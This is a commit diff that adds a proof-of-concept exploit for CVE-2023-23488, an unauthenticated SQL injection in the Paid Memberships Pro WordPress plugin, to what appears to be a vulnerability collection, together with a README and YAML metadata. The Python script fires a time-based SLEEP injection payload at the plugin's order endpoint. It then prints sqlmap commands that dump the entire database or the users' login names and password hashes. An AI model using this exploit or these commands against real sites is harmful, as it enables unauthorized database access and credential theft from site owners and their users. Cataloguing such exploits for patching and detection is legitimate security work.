Pre Merge pull request !445 from 吕泊伸/master

2023-05-06 04:16:27 +00:00 · 2023-05-06 04:16:27 +00:00 · bc24c37376
parent 3ebdf86b23 ae9ac43cdd
commit bc24c37376
4 changed files with 104 additions and 0 deletions
--- a/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py
+++ b/cve/WordPress/2023/CVE-2023-23488/CVE-2023-23488.py
@ -0,0 +1,59 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# https://github.com/r3nt0n
+#
+# Exploit Title: Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
+#
+# Exploit Author: r3nt0n
+# CVE: CVE-2023-23488
+# Date: 2023/01/24
+# Vulnerability discovered by Joshua Martinelle
+# Vendor Homepage: https://www.paidmembershipspro.com
+# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
+# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
+# Version: < 2.9.8
+# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
+#
+# Running this script against a WordPress instance with Paid Membership Pro plugin
+# tells you if the target is vulnerable.
+# As the SQL injection technique required to exploit it is Time-based blind, instead of
+# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
+# to dump the whole database (probably very time-consuming) or specific chose data like
+# usernames and passwords.
+#
+# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress
+
+import sys
+import requests
+
+def get_request(target_url, delay="1"):
+    payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
+    data = {'rest_route': '/pmpro/v1/order',
+            'code': payload}
+    return requests.get(target_url, params=data).elapsed.total_seconds()
+
+print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')
+if len(sys.argv) != 2:
+    print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))
+    print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
+    sys.exit(1)
+
+target_url = sys.argv[1]
+try:
+    print('[-] Testing if the target is vulnerable...')
+    req = requests.get(target_url, timeout=15)
+except:
+    print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))
+    sys.exit(2)
+
+if get_request(target_url, "1") >= get_request(target_url, "2"):
+    print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))
+    sys.exit(3)
+print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
+print('\n[+] You can dump the whole WordPress database with:')
+print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
+print('\n[+] To dump data from specific tables:')
+print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
+print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')
+print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))
+sys.exit(0)
--- a/cve/WordPress/2023/CVE-2023-23488/README.md
+++ b/cve/WordPress/2023/CVE-2023-23488/README.md
@ -0,0 +1,24 @@
+# CVE-2023-23488-PoC
+Unauthenticated SQL Injection - Paid Memberships Pro &lt; 2.9.8 (WordPress Plugin)
+
+Running this script against a WordPress instance with Paid Membership Pro plugin
+tells you if the target is vulnerable.
+As the SQL injection technique required to exploit it is Time-based blind, instead of
+trying to directly exploit the vuln, it will generate the appropriate sqlmap command
+to dump the whole database (probably very time-consuming) or specific chose data like
+usernames and passwords.
+
+Usage example:
+
+```shell
+python3 CVE-2023-23488.py http://127.0.0.1/wordpress
+```
+
+
+## References
+
+ Credits to **Joshua Martinelle**, who discovered the vulnerability
+ ExploitDB link: https://www.exploit-db.com/exploits/51235
+ Vendor Homepage: https://www.paidmembershipspro.com
+ Vulnerable software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
+ Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
--- a/cve/WordPress/2023/yaml/CVE-2023-23488.yaml
+++ b/cve/WordPress/2023/yaml/CVE-2023-23488.yaml
@ -0,0 +1,20 @@
+id: CVE-2023-23488
+source: https://github.com/r3nt0n/CVE-2023-23488-PoC
+info:
+  name: WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。
+  severity: critical
+  description:
+    WordPress Plugin The Paid Memberships Pro 2.9.8 版本之前存在SQL注入漏洞，该漏洞源于 /pmpro/v1/order 的 code 参数存在 SQL 注入问题。该poc展示了如何利用该漏洞
+  scope-of-influence:
+    WordPress Plugin The Paid Memberships Pro ≤ 2.9.8 
+  reference:
+    - https://packetstormsecurity.com/files/171661/WordPress-Paid-Memberships-Pro-2.9.8-SQL-Injection.html
+    - https://www.tenable.com/security/research/tra-2023-2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-23488
+    cwe-id: CWE-89
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, WordPress
--- a/other_list.yaml
+++ b/other_list.yaml
@ -66,6 +66,7 @@ cve:
 cnvd:
  WordPress:
    - CVE-2019-8942
+    - CVE-2023-23488
  Zimbra:
    - CVE-2022-41352
 cnvd: